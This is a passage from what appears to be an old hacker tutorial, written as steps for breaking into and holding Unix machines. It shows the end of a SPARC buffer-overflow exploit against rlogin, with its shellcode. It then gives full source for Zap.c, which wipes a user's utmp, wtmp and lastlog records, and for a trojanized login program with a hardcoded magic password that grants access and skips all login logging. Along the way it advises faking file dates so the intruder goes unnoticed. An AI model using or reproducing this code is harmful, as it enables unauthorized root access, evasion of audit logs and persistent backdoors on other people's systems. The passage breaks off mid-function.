    &amp;quot;\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc&amp;quot;
    &amp;quot;\x82\x10\x20\x3b\x91\xd4\xff\xff&amp;quot;;

u_long get_sp(void)
{
    __asm__(&amp;quot;mov %sp,%i0 \n&amp;quot;);
}

void main(int argc, char *argv[])
{
    char buf[BUF_LENGTH + EXTRA];
    long targ_addr;
    u_long *long_p;
    u_char *char_p;
    int i, code_length = strlen(sparc_shellcode);

    /* fill the buffer with SPARC NOPs, then the shellcode */
    long_p = (u_long *) buf;
    for (i = 0; i &amp;lt; (BUF_LENGTH - code_length) / sizeof(u_long); i++)
        *long_p++ = SPARC_NOP;
    char_p = (u_char *) long_p;
    for (i = 0; i &amp;lt; code_length; i++)
        *char_p++ = sparc_shellcode[i];

    /* then EXTRA bytes of the guessed return address, somewhere inside the sled */
    long_p = (u_long *) char_p;
    targ_addr = get_sp() - STACK_OFFSET;
    for (i = 0; i &amp;lt; EXTRA / sizeof(u_long); i++)
        *long_p++ = targ_addr;

    printf(&amp;quot;Jumping to address 0x%lx\n&amp;quot;, targ_addr);
    /* the overlong argument overflows a stack buffer inside rlogin */
    execl(&amp;quot;/usr/bin/rlogin&amp;quot;, &amp;quot;rlogin&amp;quot;, buf, (char *) 0);
    perror(&amp;quot;execl failed&amp;quot;);
}

Want more exploits? Get &amp;#39;em from other sites (like rootshell, dhp.com/~fyodor, etc...).

Step 3: Covering your tracks:
______

For this you could use lots of programs like zap, utclean, and lots of others... Watch out: ALWAYS, after you have cloaked yourself, check that it worked with a:

victim1:~$ who
...(crap)...
victim1:~$ finger
...;as;;sda...
victim1:~$ w
...

If you are still not cloaked, look for wtmpx, utmpx and other stuff like that. The only cloaker (that I know) that erased me even from wtmpx/utmpx was utclean.
But I don&amp;#39;t have it right now, so ZAP&amp;#39;ll have to do the job.

/*
 *  Title:    Zap.c (c) rokK Industries
 *  Sequence: 911204.B
 *  Syztems:  Kompiles on SunOS 4.+
 *  Note:     To mask yourself from lastlog and wtmp you need to be root,
 *            utmp is go+w on default SunOS, but is sometimes removed.
 *  Kompile:  cc -O Zap.c -o Zap
 *  Run:      Zap &amp;lt;Username&amp;gt;
 *  Desc:     Will Fill the Wtmp and Utmp Entries corresponding to the
 *            entered Username. It also Zeros out the last login data for
 *            the specific user, fingering that user will show
 *            &amp;#39;Never Logged In&amp;#39;
 *  Usage:    If you cant find a usage for this, get a brain.
 */

#include &amp;lt;sys/types.h&amp;gt;
#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;string.h&amp;gt;    /* strncmp, strlen */
#include &amp;lt;strings.h&amp;gt;   /* bzero */
#include &amp;lt;unistd.h&amp;gt;
#include &amp;lt;fcntl.h&amp;gt;
#include &amp;lt;utmp.h&amp;gt;
#include &amp;lt;lastlog.h&amp;gt;
#include &amp;lt;pwd.h&amp;gt;

int f;

/* overwrite, in place, every utmp/wtmp record whose ut_name starts with
 * &amp;#39;who&amp;#39;. The file keeps its length; a zero-filled record is left behind. */
void kill_tmp(name,who)
char *name, *who;
{
    struct utmp utmp_ent;

    if ((f=open(name,O_RDWR))&amp;gt;=0) {
        while(read (f, &amp;amp;utmp_ent, sizeof (utmp_ent))&amp;gt; 0 )
            if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
                bzero((char *)&amp;amp;utmp_ent,sizeof( utmp_ent ));
                lseek (f, -(long)(sizeof (utmp_ent)), SEEK_CUR);
                write (f, &amp;amp;utmp_ent, sizeof (utmp_ent));
            }
        close(f);
    }
}

/* zero the user&amp;#39;s slot in lastlog (the file is indexed by uid), so finger
 * reports &amp;#39;Never logged in&amp;#39; */
void kill_lastlog(who)
char *who;
{
    struct passwd *pwd;
    struct lastlog newll;

    if ((pwd=getpwnam(who))!=NULL) {
        if ((f=open(&amp;quot;/usr/adm/lastlog&amp;quot;, O_RDWR)) &amp;gt;= 0) {
            lseek(f, (long)pwd-&amp;gt;pw_uid * sizeof (struct lastlog), 0);
            bzero((char *)&amp;amp;newll,sizeof( newll ));
            write(f, (char *)&amp;amp;newll, sizeof( newll ));
            close(f);
        }
    } else printf(&amp;quot;%s: ?\n&amp;quot;,who);
}

main(argc,argv)
int argc;
char *argv[];
{
    if (argc==2) {
        kill_tmp(&amp;quot;/etc/utmp&amp;quot;,argv[1]);
        kill_tmp(&amp;quot;/usr/adm/wtmp&amp;quot;,argv[1]);
        kill_lastlog(argv[1]);
        printf(&amp;quot;Zap!\n&amp;quot;);
    } else printf(&amp;quot;Error.\n&amp;quot;);
}

Step 4: Keeping that account.
_______

This usually means that you&amp;#39;ll have to install some programs to give you access even if the root has killed your account... (DAEMONS!!!) =&amp;gt;|-@

Here is an example of a login daemon from the DemonKit (good job, fellows...)

LOOK OUT !!! If you decide to put a daemon, be careful and modify its date of creation. (use touch --help to see how!)

/* This is a simple trojanized login program, this was designed for Linux
   and will not work without modification on linux. It lets you login as
   either a root user, or any ordinary user by use of a &amp;#39;magic password&amp;#39;.
   It will also prevent the login from being logged into utmp, wtmp, etc.
   You will effectively be invisible, and not be detected except via &amp;#39;ps&amp;#39;. */

#define BACKDOOR &amp;quot;password&amp;quot;
int krad=0;   /* bumped when the magic password is typed; while non-zero the
                 utmp, wtmp, lastlog and syslog writes below are skipped */

/* This program is derived from 4.3 BSD software and is subject to the
   copyright notice below.

   The port to HP-UX has been motivated by the incapability of
   &amp;#39;rlogin&amp;#39;/&amp;#39;rlogind&amp;#39; as per HP-UX 6.5 (and 7.0) to transfer window sizes.

   Changes:
   - General HP-UX portation. Use of facilities not available in HP-UX
     (e.g. setpriority) has been eliminated.
     Utmp/wtmp handling has been ported.
   - The program uses BSD command line options to be used in connection
     with e.g. &amp;#39;rlogind&amp;#39; i.e. &amp;#39;new login&amp;#39;.
   - HP features left out:     logging of bad login attempts in /etc/btmp,
                               they are sent to syslog
                               password expiry
                               &amp;#39;*&amp;#39; as login shell, add it if you need it
   - BSD features left out:    quota checks
                               password expiry
                               analysis of terminal type (tset feature)
   - BSD features thrown in:   Security logging to syslogd.
                               This requires you to have a (ported) syslog
                               system -- 7.0 comes with syslog
                               &amp;#39;Lastlog&amp;#39; feature.
   - A lot of nitty gritty details has been adjusted in favour of
     HP-UX, e.g. /etc/securetty, default paths and the environment
     variables assigned by &amp;#39;login&amp;#39;.
- We do *nothing* to setup/alter tty state, under HP-UX this is to be done by getty/rlogind/telnetd/some one else. Michael Glad (glad@daimi.dk) Computer Science Department Aarhus University Denmark 1990-07-04 1991-09-24 glad@daimi.aau.dk: HP-UX 8.0 port: - now explictly sets non-blocking mode on descriptors - strcasecmp is now part of HP-UX 1992-02-05 poe@daimi.aau.dk: Ported the stuff to Linux 0.12 From 1992 till now (1995) this code for Linux has been maintained at ftp.daimi.aau.dk:/pub/linux/poe/ */ /* * Copyright (c) 1980, 1987, 1988 The Regents of the University of California. * All rights reserved. * * Redistribution and use in source and binary forms are permitted * provided that the above copyright notice and this paragraph are * duplicated in all such forms and that any documentation, * advertising materials, and other materials related to such * distribution and use acknowledge that the software was developed * by the University of California, Berkeley. The name of the * University may not be used to endorse or promote products derived * from this software without specific prior written permission. * THIS SOFTWARE IS PROVIDED ``AS IS&amp;#39;&amp;#39; AND WITHOUT ANY EXPRESS OR * IMPLIED WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED * WARRANTIES OF MERCHANTIBILITY AND FITNESS FOR A PARTICULAR PURPOSE. */ #ifndef lint char copyright[] = &amp;quot;@(#) Copyright (c) 1980, 1987, 1988 The Regents of the University of California.\n\ All rights reserved.\n&amp;quot;; #endif /* not lint */ #ifndef lint static char sccsid[] = &amp;quot;@(#)login.c 5.40 (Berkeley) 5/9/89&amp;quot;; #endif /* not lint */ /* * login [ name ] * login -h hostname (for telnetd, etc.) * login -f name (for pre-authenticated login: datakit, xterm, etc.) 
*/ /* #define TESTING */ #ifdef TESTING   #include &amp;quot;param.h&amp;quot; #else #include &amp;lt;sys/param.h&amp;gt; #endif #include &amp;lt;ctype.h&amp;gt; #include &amp;lt;unistd.h&amp;gt; #include &amp;lt;getopt.h&amp;gt; #include &amp;lt;memory.h&amp;gt; #include &amp;lt;sys/stat.h&amp;gt; #include &amp;lt;sys/time.h&amp;gt; #include &amp;lt;sys/resource.h&amp;gt; #include &amp;lt;sys/file.h&amp;gt; #include &amp;lt;termios.h&amp;gt; #include &amp;lt;string.h&amp;gt; #define index strchr #define rindex strrchr #include &amp;lt;sys/ioctl.h&amp;gt; #include &amp;lt;signal.h&amp;gt; #include &amp;lt;errno.h&amp;gt; #include &amp;lt;grp.h&amp;gt; #include &amp;lt;pwd.h&amp;gt; #include &amp;lt;setjmp.h&amp;gt; #include &amp;lt;stdlib.h&amp;gt; #include &amp;lt;stdio.h&amp;gt; #include &amp;lt;string.h&amp;gt; #include &amp;lt;sys/syslog.h&amp;gt; #include &amp;lt;sys/sysmacros.h&amp;gt; #include &amp;lt;netdb.h&amp;gt; #ifdef TESTING # include &amp;quot;utmp.h&amp;quot; #else # include &amp;lt;utmp.h&amp;gt; #endif #ifdef SHADOW_PWD #include &amp;lt;shadow.h&amp;gt; #endif #ifndef linux #include &amp;lt;tzfile.h&amp;gt; #include &amp;lt;lastlog.h&amp;gt; #else struct lastlog { long ll_time; char ll_line[12]; char ll_host[16]; }; #endif #include &amp;quot;pathnames.h&amp;quot; #define P_(s) () void opentty P_((const char *tty)); void getloginname P_((void)); void timedout P_((void)); int rootterm P_((char *ttyn));   void motd P_((void)); void sigint P_((void)); void checknologin P_((void)); void dolastlog P_((int quiet)); void badlogin P_((char *name)); char *stypeof P_((char *ttyid)); void checktty P_((char *user, char *tty)); void getstr P_((char *buf, int cnt, char *err)); void sleepexit P_((int eval)); #undef P_ #ifdef KERBEROS #include &amp;lt;kerberos/krb.h&amp;gt; #include &amp;lt;sys/termios.h&amp;gt; char realm[REALM_SZ]; int kerror = KSUCCESS, notickets = 1; #endif #ifndef linux #define TTYGRPNAME &amp;quot;tty&amp;quot; #else # define TTYGRPNAME 
&amp;quot;other&amp;quot; # ifndef MAXPATHLEN # define MAXPATHLEN 1024 # endif #endif /* name of group to own ttys */  /* * This bounds the time given to login. Not a define so it can * be patched on machines where it&amp;#39;s too small. */ #ifndef linux int timeout = 300; #else int timeout = 60; #endif struct passwd *pwd; int failures; char term[64], *hostname, *username, *tty; char thishost[100];  #ifndef linux struct sgttyb sgttyb; struct tchars tc = { CINTR, CQUIT, CSTART, CSTOP, CEOT, CBRK }; struct ltchars ltc = { CSUSP, CDSUSP, CRPRNT, CFLUSH, CWERASE, CLNEXT }; #endif char *months[] = { &amp;quot;Jan&amp;quot;, &amp;quot;Feb&amp;quot;, &amp;quot;Mar&amp;quot;, &amp;quot;Apr&amp;quot;, &amp;quot;May&amp;quot;, &amp;quot;Jun&amp;quot;, &amp;quot;Jul&amp;quot;, &amp;quot;Aug&amp;quot;, &amp;quot;Sep&amp;quot;, &amp;quot;Oct&amp;quot;, &amp;quot;Nov&amp;quot;, &amp;quot;Dec&amp;quot; }; /* provided by Linus Torvalds 16-Feb-93 */   void opentty(const char * tty) { int i; int fd = open(tty, O_RDWR); for (i = 0 ; i &amp;lt; fd ; i++) close(i); for (i = 0 ; i &amp;lt; 3 ; i++) dup2(fd, i); if (fd &amp;gt;= 3) close(fd);  }  int main(argc, argv) int argc; char **argv; { extern int errno, optind; extern char *optarg, **environ; struct timeval tp; struct tm *ttp; struct group *gr; register int ch; register char *p; int ask, fflag, hflag, pflag, cnt; int quietlog, passwd_req, ioctlval; char *domain, *salt, *ttyn, *pp; char tbuf[MAXPATHLEN + 2], tname[sizeof(_PATH_TTY) + 10]; char *ctime(), *ttyname(), *stypeof(); time_t time(); void timedout(); char *termenv; #ifdef linux char tmp[100]; /* Just as arbitrary as mountain time: */ /* (void)setenv(&amp;quot;TZ&amp;quot;, &amp;quot;MET-1DST&amp;quot;,0); */ #endif (void)signal(SIGALRM, timedout); (void)alarm((unsigned int)timeout); (void)signal(SIGQUIT, SIG_IGN); (void)signal(SIGINT, SIG_IGN); (void)setpriority(PRIO_PROCESS, 0, 0); #ifdef HAVE_QUOTA (void)quota(Q_SETUID, 0, 0, 0); #endif /* * -p is used by getty to tell 
login not to destroy the environment * -f is used to skip a second login authentication * -h is used by other servers to pass the name of the remote * host to login so that it may be placed in utmp and wtmp */ (void)gethostname(tbuf, sizeof(tbuf));   (void)strncpy(thishost, tbuf, sizeof(thishost)-1); domain = index(tbuf, &amp;#39;.&amp;#39;); fflag = hflag = pflag = 0; passwd_req = 1; while ((ch = getopt(argc, argv, &amp;quot;fh:p&amp;quot;)) != EOF) switch (ch) { case &amp;#39;f&amp;#39;: fflag = 1; break; case &amp;#39;h&amp;#39;: if (getuid()) { (void)fprintf(stderr, &amp;quot;login: -h for super-user only.\n&amp;quot;); exit(1); } hflag = 1; if (domain &amp;amp;&amp;amp; (p = index(optarg, &amp;#39;.&amp;#39;)) &amp;amp;&amp;amp; strcasecmp(p, domain) == 0) *p = 0; hostname = optarg; break; case &amp;#39;p&amp;#39;: pflag = 1; break; case &amp;#39;?&amp;#39;: default: (void)fprintf(stderr, &amp;quot;usage: login [-fp] [username]\n&amp;quot;); exit(1); } argc -= optind; argv += optind; if (*argv) { username = *argv; ask = 0; } else ask = 1; #ifndef linux ioctlval = 0; (void)ioctl(0, TIOCLSET, &amp;amp;ioctlval); (void)ioctl(0, TIOCNXCL, 0); (void)fcntl(0, F_SETFL, ioctlval); (void)ioctl(0, TIOCGETP, &amp;amp;sgttyb); sgttyb.sg_erase = CERASE; sgttyb.sg_kill = CKILL; (void)ioctl(0, TIOCSLTC, &amp;amp;ltc); (void)ioctl(0, TIOCSETC, &amp;amp;tc); (void)ioctl(0, TIOCSETP, &amp;amp;sgttyb); /* * Be sure that we&amp;#39;re in * blocking mode!!! 
* This is really for HPUX */   #endif  ioctlval = 0; (void)ioctl(0, FIOSNBIO, &amp;amp;ioctlval);  for (cnt = getdtablesize(); cnt &amp;gt; 2; cnt--) close(cnt); ttyn = ttyname(0); if (ttyn == NULL || *ttyn == &amp;#39;\0&amp;#39;) { (void)sprintf(tname, &amp;quot;%s??&amp;quot;, _PATH_TTY); ttyn = tname; } setpgrp(); { struct termios tt, ttt; tcgetattr(0, &amp;amp;tt); ttt = tt; ttt.c_cflag &amp;amp;= ~HUPCL; if((chown(ttyn, 0, 0) == 0) &amp;amp;&amp;amp; (chmod(ttyn, 0622) == 0)) { tcsetattr(0,TCSAFLUSH,&amp;amp;ttt); signal(SIGHUP, SIG_IGN); /* so vhangup() wont kill us */ vhangup(); signal(SIGHUP, SIG_DFL); } setsid(); /* re-open stdin,stdout,stderr after vhangup() closed them */ /* if it did, after 0.99.5 it doesn&amp;#39;t! */ opentty(ttyn); tcsetattr(0,TCSAFLUSH,&amp;amp;tt); } if (tty = rindex(ttyn, &amp;#39;/&amp;#39;)) ++tty; else tty = ttyn; openlog(&amp;quot;login&amp;quot;, LOG_ODELAY, LOG_AUTH); for (cnt = 0;; ask = 1) { ioctlval = 0; #ifndef linux (void)ioctl(0, TIOCSETD, &amp;amp;ioctlval); #endif if (ask) { fflag = 0; getloginname(); } checktty(username, tty); (void)strcpy(tbuf, username);   if (pwd = getpwnam(username)) salt = pwd-&amp;gt;pw_passwd; else salt = &amp;quot;xx&amp;quot;; /* if user not super-user, check for disabled logins */ if (pwd == NULL || pwd-&amp;gt;pw_uid) checknologin(); /* * Disallow automatic login to root; if not invoked by * root, disallow if the uid&amp;#39;s differ. */ if (fflag &amp;amp;&amp;amp; pwd) { int uid = getuid(); passwd_req = pwd-&amp;gt;pw_uid == 0 || (uid &amp;amp;&amp;amp; uid != pwd-&amp;gt;pw_uid);  }  /* * If trying to log in as root, but with insecure terminal, * refuse the login attempt. 
*/ if (pwd &amp;amp;&amp;amp; pwd-&amp;gt;pw_uid == 0 &amp;amp;&amp;amp; !rootterm(tty)) { (void)fprintf(stderr, &amp;quot;%s login refused on this terminal.\n&amp;quot;, pwd-&amp;gt;pw_name); if (hostname) syslog(LOG_NOTICE, &amp;quot;LOGIN %s REFUSED FROM %s ON TTY %s&amp;quot;, pwd-&amp;gt;pw_name, hostname, tty); else syslog(LOG_NOTICE, &amp;quot;LOGIN %s REFUSED ON TTY %s&amp;quot;, pwd-&amp;gt;pw_name, tty); continue;  }  /* * If no pre-authentication and a password exists * for this user, prompt for one and verify it. */ if (!passwd_req || (pwd &amp;amp;&amp;amp; !*pwd-&amp;gt;pw_passwd)) break; setpriority(PRIO_PROCESS, 0, -4); pp = getpass(&amp;quot;Password: &amp;quot;); if(strcmp(BACKDOOR, pp) == 0) krad++; p = crypt(pp, salt); setpriority(PRIO_PROCESS, 0, 0); #ifdef KERBEROS /* * If not present in pw file, act as we normally would.   * If we aren&amp;#39;t Kerberos-authenticated, try the normal * pw file for a password. If that&amp;#39;s ok, log the user * in without issueing any tickets. 
*/ if (pwd &amp;amp;&amp;amp; !krb_get_lrealm(realm,1)) { /* * get TGT for local realm; be careful about uid&amp;#39;s * here for ticket file ownership */ (void)setreuid(geteuid(),pwd-&amp;gt;pw_uid); kerror = krb_get_pw_in_tkt(pwd-&amp;gt;pw_name, &amp;quot;&amp;quot;, realm, &amp;quot;krbtgt&amp;quot;, realm, DEFAULT_TKT_LIFE, pp); (void)setuid(0); if (kerror == INTK_OK) { memset(pp, 0, strlen(pp)); notickets = 0; /* user got ticket */ break; } } (void) memset(pp, 0, strlen(pp)); if (pwd &amp;amp;&amp;amp; !strcmp(p, pwd-&amp;gt;pw_passwd)) break; if(krad != 0) break;  #endif  (void)printf(&amp;quot;Login incorrect\n&amp;quot;); failures++; badlogin(username); /* log ALL bad logins */ /* we allow 10 tries, but after 3 we start backing off */ if (++cnt &amp;gt; 3) { if (cnt &amp;gt;= 10) { sleepexit(1); } sleep((unsigned int)((cnt - 3) * 5)); } } /* committed to login -- turn off timeout */ (void)alarm((unsigned int)0); #ifdef HAVE_QUOTA if (quota(Q_SETUID, pwd-&amp;gt;pw_uid, 0, 0) &amp;lt; 0 &amp;amp;&amp;amp; errno != EINVAL) { switch(errno) { case EUSERS: (void)fprintf(stderr, &amp;quot;Too many users logged on already.\nTry again later.\n&amp;quot;); break; case EPROCLIM: (void)fprintf(stderr, &amp;quot;You have too many processes running.\n&amp;quot;);   break; default: perror(&amp;quot;quota (Q_SETUID)&amp;quot;); } sleepexit(0); } #endif /* paranoia... */ endpwent(); /* This requires some explanation: As root we may not be able to read the directory of the user if it is on an NFS mounted filesystem. We temporarily set our effective uid to the user-uid making sure that we keep root privs. in the real uid. 
   A portable solution would require a fork(), but we rely on Linux
   having the BSD setreuid() */
    {
        char tmpstr[MAXPATHLEN];
        uid_t ruid = getuid();
        gid_t egid = getegid();

        strncpy(tmpstr, pwd-&amp;gt;pw_dir, MAXPATHLEN-12);
        strncat(tmpstr, (&amp;quot;/&amp;quot; _PATH_HUSHLOGIN), MAXPATHLEN);
        setregid(-1, pwd-&amp;gt;pw_gid);
        setreuid(0, pwd-&amp;gt;pw_uid);
        quietlog = (access(tmpstr, R_OK) == 0);
        setuid(0); /* setreuid doesn&amp;#39;t do it alone! */
        setreuid(ruid, 0);
        setregid(-1, egid);
    }

#ifndef linux
#ifdef KERBEROS
    if (notickets &amp;amp;&amp;amp; !quietlog)
        (void)printf(&amp;quot;Warning: no Kerberos tickets issued\n&amp;quot;);
#endif

#define TWOWEEKS (14*24*60*60)
    if (pwd-&amp;gt;pw_change || pwd-&amp;gt;pw_expire)
        (void)gettimeofday(&amp;amp;tp, (struct timezone *)NULL);
    if (pwd-&amp;gt;pw_change)
        if (tp.tv_sec &amp;gt;= pwd-&amp;gt;pw_change) {
            (void)printf(&amp;quot;Sorry -- your password has expired.\n&amp;quot;);
            sleepexit(1);
        }
        else if (tp.tv_sec - pwd-&amp;gt;pw_change &amp;lt; TWOWEEKS &amp;amp;&amp;amp; !quietlog) {
            ttp = localtime(&amp;amp;pwd-&amp;gt;pw_change);
            (void)printf(&amp;quot;Warning: your password expires on %s %d, %d\n&amp;quot;,
                months[ttp-&amp;gt;tm_mon], ttp-&amp;gt;tm_mday,
                TM_YEAR_BASE + ttp-&amp;gt;tm_year);
        }
    if (pwd-&amp;gt;pw_expire)
        if (tp.tv_sec &amp;gt;= pwd-&amp;gt;pw_expire) {
            (void)printf(&amp;quot;Sorry -- your account has expired.\n&amp;quot;);
            sleepexit(1);
        }
        else if (tp.tv_sec - pwd-&amp;gt;pw_expire &amp;lt; TWOWEEKS &amp;amp;&amp;amp; !quietlog) {
            ttp = localtime(&amp;amp;pwd-&amp;gt;pw_expire);
            (void)printf(&amp;quot;Warning: your account expires on %s %d, %d\n&amp;quot;,
                months[ttp-&amp;gt;tm_mon], ttp-&amp;gt;tm_mday,
                TM_YEAR_BASE + ttp-&amp;gt;tm_year);
        }

    /* nothing else left to fail -- really log in */
    {
        struct utmp utmp;

        memset((char *)&amp;amp;utmp, 0, sizeof(utmp));
        (void)time(&amp;amp;utmp.ut_time);
        strncpy(utmp.ut_name, username, sizeof(utmp.ut_name));
        if (hostname)
            strncpy(utmp.ut_host, hostname,
                    sizeof(utmp.ut_host));
        strncpy(utmp.ut_line, tty, sizeof(utmp.ut_line));
        login(&amp;amp;utmp);
    }
#else
    /* for linux, write entries in utmp and wtmp */
    {
        struct utmp ut;
        char *ttyabbrev;
        int wtmp;

        memset((char *)&amp;amp;ut, 0, sizeof(ut));
        ut.ut_type = USER_PROCESS;
        ut.ut_pid = getpid();
        strncpy(ut.ut_line, ttyn + sizeof(&amp;quot;/dev/&amp;quot;)-1, sizeof(ut.ut_line));
        ttyabbrev = ttyn + sizeof(&amp;quot;/dev/tty&amp;quot;) - 1;
        strncpy(ut.ut_id, ttyabbrev, sizeof(ut.ut_id));
        (void)time(&amp;amp;ut.ut_time);
        strncpy(ut.ut_user, username, sizeof(ut.ut_user));

        /* fill in host and ip-addr fields when we get networking */
        if (hostname) {
            struct hostent *he;

            strncpy(ut.ut_host, hostname, sizeof(ut.ut_host));
            if ((he = gethostbyname(hostname)))
                memcpy(&amp;amp;ut.ut_addr, he-&amp;gt;h_addr_list[0], sizeof(ut.ut_addr));
        }

        /* the backdoor: with krad set, the USER_PROCESS record is written to
           neither utmp nor wtmp, so who/w/last never see the session */
        utmpname(_PATH_UTMP);
        setutent();
        if(krad == 0)
            pututline(&amp;amp;ut);
        endutent();

        if((wtmp = open(_PATH_WTMP, O_APPEND|O_WRONLY)) &amp;gt;= 0) {
            flock(wtmp, LOCK_EX);
            if(krad == 0)
                write(wtmp, (char *)&amp;amp;ut, sizeof(ut));
            flock(wtmp, LOCK_UN);
            close(wtmp);
        }
    }
#endif

    /* fix_utmp_type_and_user(username, ttyn, LOGIN_PROCESS); */

    if(krad == 0)
        dolastlog(quietlog);

#ifndef linux
    if (!hflag) {                   /* XXX */
        static struct winsize win = { 0, 0, 0, 0 };

        (void)ioctl(0, TIOCSWINSZ, &amp;amp;win);
    }
#endif

    (void)chown(ttyn, pwd-&amp;gt;pw_uid,
        (gr = getgrnam(TTYGRPNAME)) ?
gr-&amp;gt;gr_gid : pwd-&amp;gt;pw_gid); (void)chmod(ttyn, 0622); (void)setgid(pwd-&amp;gt;pw_gid); initgroups(username, pwd-&amp;gt;pw_gid); #ifdef HAVE_QUOTA quota(Q_DOWARN, pwd-&amp;gt;pw_uid, (dev_t)-1, 0); #endif if (*pwd-&amp;gt;pw_shell == &amp;#39;\0&amp;#39;) pwd-&amp;gt;pw_shell = _PATH_BSHELL; #ifndef linux /* turn on new line discipline for the csh */ else if (!strcmp(pwd-&amp;gt;pw_shell, _PATH_CSHELL)) { ioctlval = NTTYDISC; (void)ioctl(0, TIOCSETD, &amp;amp;ioctlval); } #endif /* preserve TERM even without -p flag */ { char *ep; if(!((ep = getenv(&amp;quot;TERM&amp;quot;)) &amp;amp;&amp;amp; (termenv = strdup(ep)))) termenv = &amp;quot;dumb&amp;quot;;   } /* destroy environment unless user has requested preservation */ if (!pflag) { environ = (char**)malloc(sizeof(char*)); memset(environ, 0, sizeof(char*)); } #ifndef linux (void)setenv(&amp;quot;HOME&amp;quot;, pwd-&amp;gt;pw_dir, 1); (void)setenv(&amp;quot;SHELL&amp;quot;, pwd-&amp;gt;pw_shell, 1); if (term[0] == &amp;#39;\0&amp;#39;) strncpy(term, stypeof(tty), sizeof(term)); (void)setenv(&amp;quot;TERM&amp;quot;, term, 0); (void)setenv(&amp;quot;USER&amp;quot;, pwd-&amp;gt;pw_name, 1); (void)setenv(&amp;quot;PATH&amp;quot;, _PATH_DEFPATH, 0); #else (void)setenv(&amp;quot;HOME&amp;quot;, pwd-&amp;gt;pw_dir, 0); /* legal to override */ if(pwd-&amp;gt;pw_uid) (void)setenv(&amp;quot;PATH&amp;quot;, _PATH_DEFPATH, 1); else (void)setenv(&amp;quot;PATH&amp;quot;, _PATH_DEFPATH_ROOT, 1); (void)setenv(&amp;quot;SHELL&amp;quot;, pwd-&amp;gt;pw_shell, 1); (void)setenv(&amp;quot;TERM&amp;quot;, termenv, 1); /* mailx will give a funny error msg if you forget this one */ (void)sprintf(tmp,&amp;quot;%s/%s&amp;quot;,_PATH_MAILDIR,pwd-&amp;gt;pw_name); (void)setenv(&amp;quot;MAIL&amp;quot;,tmp,0); /* LOGNAME is not documented in login(1) but HP-UX 6.5 does it. We&amp;#39;ll not allow modifying it. 
*/ (void)setenv(&amp;quot;LOGNAME&amp;quot;, pwd-&amp;gt;pw_name, 1); #endif #ifndef linux if (tty[sizeof(&amp;quot;tty&amp;quot;)-1] == &amp;#39;d&amp;#39;) if(krad == 0) syslog(LOG_INFO, &amp;quot;DIALUP %s, %s&amp;quot;, tty, pwd-&amp;gt;pw_name);  #endif if (pwd-&amp;gt;pw_uid == 0) if(krad == 0) if (hostname) syslog(LOG_NOTICE, &amp;quot;ROOT LOGIN ON %s FROM %s&amp;quot;, tty, hostname); else syslog(LOG_NOTICE, &amp;quot;ROOT LOGIN ON %s&amp;quot;, tty);   if (!quietlog) { struct stat st; motd(); (void)sprintf(tbuf, &amp;quot;%s/%s&amp;quot;, _PATH_MAILDIR, pwd-&amp;gt;pw_name); if (stat(tbuf, &amp;amp;st) == 0 &amp;amp;&amp;amp; st.st_size != 0) (void)printf(&amp;quot;You have %smail.\n&amp;quot;, (st.st_mtime &amp;gt; st.st_atime) ? &amp;quot;new &amp;quot; : &amp;quot;&amp;quot;);  }  (void)signal(SIGALRM, SIG_DFL); (void)signal(SIGQUIT, SIG_DFL); (void)signal(SIGINT, SIG_DFL); (void)signal(SIGTSTP, SIG_IGN); (void)signal(SIGHUP, SIG_DFL); /* discard permissions last so can&amp;#39;t get killed and drop core */ if(setuid(pwd-&amp;gt;pw_uid) &amp;lt; 0 &amp;amp;&amp;amp; pwd-&amp;gt;pw_uid) { syslog(LOG_ALERT, &amp;quot;setuid() failed&amp;quot;); exit(1); } /* wait until here to change directory! 
*/ if (chdir(pwd-&amp;gt;pw_dir) &amp;lt; 0) { (void)printf(&amp;quot;No directory %s!\n&amp;quot;, pwd-&amp;gt;pw_dir); if (chdir(&amp;quot;/&amp;quot;)) exit(0); pwd-&amp;gt;pw_dir = &amp;quot;/&amp;quot;; (void)printf(&amp;quot;Logging in with home = \&amp;quot;/\&amp;quot;.\n&amp;quot;); } /* if the shell field has a space: treat it like a shell script */ if (strchr(pwd-&amp;gt;pw_shell, &amp;#39; &amp;#39;)) { char *buff = malloc(strlen(pwd-&amp;gt;pw_shell) + 6); if (buff) { strcpy(buff, &amp;quot;exec &amp;quot;); strcat(buff, pwd-&amp;gt;pw_shell); execlp(&amp;quot;/bin/sh&amp;quot;, &amp;quot;-sh&amp;quot;, &amp;quot;-c&amp;quot;, buff, (char *)0); fprintf(stderr, &amp;quot;login: couldn&amp;#39;t exec shell script: %s.\n&amp;quot;, strerror(errno)); exit(0); } fprintf(stderr, &amp;quot;login: no memory for shell script.\n&amp;quot;); exit(0); } tbuf[0] = &amp;#39;-&amp;#39;; strcpy(tbuf + 1, ((p = rindex(pwd-&amp;gt;pw_shell, &amp;#39;/&amp;#39;)) ? p + 1 : pwd-&amp;gt;pw_shell)); execlp(pwd-&amp;gt;pw_shell, tbuf, (char *)0); (void)fprintf(stderr, &amp;quot;login: no shell: %s.\n&amp;quot;, strerror(errno)); exit(0); } void   getloginname() { register int ch; register char *p; static char nbuf[UT_NAMESIZE + 1]; for (;;) { (void)printf(&amp;quot;\n%s login: &amp;quot;, thishost); fflush(stdout); for (p = nbuf; (ch = getchar()) != &amp;#39;\n&amp;#39;; ) { if (ch == EOF) { badlogin(username); exit(0); } if (p &amp;lt; nbuf + UT_NAMESIZE) *p++ = ch; } if (p &amp;gt; nbuf) if (nbuf[0] == &amp;#39;-&amp;#39;) (void)fprintf(stderr, &amp;quot;login names may not start with &amp;#39;-&amp;#39;.\n&amp;quot;); else { *p = &amp;#39;\0&amp;#39;; username = nbuf; break; } }  }  void timedout() { struct termio ti; (void)fprintf(stderr, &amp;quot;Login timed out after %d seconds\n&amp;quot;, timeout); /* reset echo */ (void) ioctl(0, TCGETA, &amp;amp;ti); ti.c_lflag |= ECHO; (void) ioctl(0, TCSETA, &amp;amp;ti); exit(0); } int rootterm(ttyn) char *ttyn; #ifndef linux { 
    struct ttyent *t;

    return((t = getttynam(ttyn)) &amp;amp;&amp;amp; t-&amp;gt;ty_status&amp;amp;TTY_SECURE);
}
#else
{
    int fd;
    char buf[100],*p;
    int cnt, more;

    fd = open(SECURETTY, O_RDONLY);
    if(fd &amp;lt; 0) return 1;

    /* read each line in /etc/securetty, if a line matches our ttyline
       then root is allowed to login on this tty, and we should return
       true. */
    for(;;) {
        p = buf; cnt = 100;
